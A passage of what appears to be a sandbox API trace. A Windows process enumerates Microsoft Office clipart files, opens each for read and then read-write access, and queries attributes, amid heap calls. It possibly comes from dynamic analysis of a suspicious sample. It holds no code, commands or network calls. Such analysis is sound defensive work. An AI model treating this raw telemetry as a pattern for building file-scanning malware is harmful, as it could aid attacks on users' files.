hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.237] CloseHandle (hObject=0x33c) returned 1 [0102.237] AreFileApisANSI () returned 1 [0102.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0102.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 69 [0102.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.237] GetFileType (hFile=0x33c) returned 0x1 [0102.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0102.237] CloseHandle (hObject=0x33c) returned 1 [0102.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0102.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0102.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0102.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0102.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0102.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0102.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.292] AreFileApisANSI () returned 1 [0102.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0102.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 69 [0102.292] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19563_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccfc47e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccfc47e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd4897d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4fe6)) returned 1 [0102.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0102.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0102.292] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.292] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.292] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd4897d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3d75, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD19582_.GIF", cAlternateFileName="")) returned 1 [0102.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0102.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0102.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0102.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0102.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0102.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0102.293] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.293] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.293] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.293] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0102.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.293] AreFileApisANSI () returned 1 [0102.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF", lpUsedDefaultChar=0x0) returned 69 [0102.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0102.293] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.293] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0102.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0102.293] AreFileApisANSI () returned 1 [0102.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0102.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 69 [0102.293] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.294] GetFileType (hFile=0x368) returned 0x1 [0102.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0102.294] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.294] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.294] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.294] CloseHandle (hObject=0x368) returned 1 [0102.294] AreFileApisANSI () returned 1 [0102.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ae18 [0102.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 69 [0102.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.295] GetFileType (hFile=0x368) returned 0x1 [0102.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0102.295] CloseHandle (hObject=0x368) returned 1 [0102.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0102.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0102.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0102.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0102.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0102.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0102.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.296] AreFileApisANSI () returned 1 [0102.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0102.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 69 [0102.296] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19582_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd4897d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3d75)) returned 1 [0102.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0102.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0102.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.296] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccfc47e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32b6, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD19695_.WMF", cAlternateFileName="")) returned 1 [0102.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0102.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0102.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0102.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0102.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0102.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0102.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0102.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.297] AreFileApisANSI () returned 1 [0102.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft 